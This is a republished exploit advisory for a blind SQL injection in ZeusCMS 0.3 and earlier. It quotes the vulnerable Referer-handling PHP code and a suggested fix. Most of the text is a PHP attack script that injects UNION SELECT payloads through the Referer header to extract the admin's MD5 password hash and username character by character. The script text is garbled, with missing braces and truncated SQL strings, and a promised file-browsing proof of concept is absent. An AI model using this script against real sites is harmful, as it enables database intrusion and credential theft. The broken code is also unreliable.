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ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit
来源:http://www.zeuscms.gr 作者:EgiX 发布时间:2007-12-28  

ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com

link.....: http://www.zeuscms.gr/
details..: works with magic_quotes_gpc = off (if magic quotes affects also $_SERVER array)

[-] Blind SQL Injection in /index.php :

129. $blockedRefCheck=security::checkRef($_SERVER["HTTP_REFERER"]); <==
131. if(@in_array($_SERVER['REMOTE_ADDR'],$blockedips) || $blockedRefCheck==TRUE){
132. include "html_files/denied.html";
133. }
134. else

[-] checkRef() function defined in /security.php :

130. function checkref($ref){
131.   if($ref){
132. $res=eregi_replace("http://","",$ref);
133. include "dbase.php";
134. $table=$prefix."referers";
135. $res=$db->query("SELECT * FROM $table WHERE url like '%$ref%' AND status='BLOCKED'"); <==
136. if($res->numRows()>0){
137. return true;
138. }
139. else{
140. return false;
141. }
142. }else{
143.      return false;
144.    }

an attacker can inject sql code through http referer header, that isn't properly checked...

[*] Possible bug fix in /index.php :

128. $ref = security::safeGet($_SERVER["HTTP_REFERER"]);
129. $blockedRefCheck = security::checkRef($ref);

[-] there is also a possible file system browsing through /image_viewer.php, p.o.c. :


ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
$sock = fsockopen($host, 80);
while (!$sock)
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
fputs($sock, $packet);
$resp = "";
while (!feof($sock)) $resp .= fread($sock, 1);
return $resp;

function check_query($sql)
global $host, $path;

$packet = "GET {$path} HTTP/1.1\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Referer: {$sql} \r\n";
$packet.= "Keep-Alive: 300\r\n";
$packet.= "Connection: keep-alive\r\n\r\n";
$html = http_send($host, $packet);

return (preg_match("/DENIED/", $html) ? true : false);

print "\n+-----------------------------------------------------------+";
print "\n| ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit by EgiX |";
print "\n+-----------------------------------------------------------+\n";

if ($argc < 3)
print "\nUsage......: php $argv[0] host path [prefix] [userid]\n";
print "\nhost.......: target server (ip/hostname)";
print "\npath.......: path to ZeusCMS directory (example: / or /zeuscms/)";
print "\nprefix.....: table's prefix (default: ze)";
print "\nuserid.....: user id (default: 1 - admin)\n";

$host = $argv[1];
$path = $argv[2];
$pre  = (isset($argv[3]) ? $argv[3] : "ze");
$uid  = (isset($argv[4]) ? $argv[4] : "1");

$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$index = 1; $md5 = "";
print "\n[-] MD5 Hash: ";

while (!strpos($md5, chr(0)))
for ($i = 0; $i <= count($hash); $i++)
  if ($i == count($hash)) die("\n[-] Exploit failed...\n");

$sql = "%'/**/AND/**/id=-1/**/UNION/**/SELECT/**/pwd,1,1,1/**/FROM/**/{$pre}_users/**/" .

if (check_query($sql)) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break; }


$char = array(0); // null char
for ($j = 97; $j <= 122; $j++) $char = array_merge($char, array($j)); // a-z
for ($j = 65; $j <= 90; $j++) $char = array_merge($char, array($j)); // A-Z
for ($j = 48; $j <= 57; $j++) $char = array_merge($char, array($j)); // 0-9

$index = 1; $user = "";
print "\n[-] Username: ";

while (!strpos($user, chr(0)))
for ($i = 0; $i <= count($char); $i++)
  if ($i == count($char)) die("\n[-] Exploit failed...\n");

$sql = "%'/**/AND/**/id=-1/**/UNION/**/SELECT/**/nickname,1,1,1/**/FROM/**/{$pre}_users/**/" .

if (check_query($sql)) { $user .= chr($char[$i]); print chr($char[$i]); break; }


print "\n\n[-] Successfull!\n";


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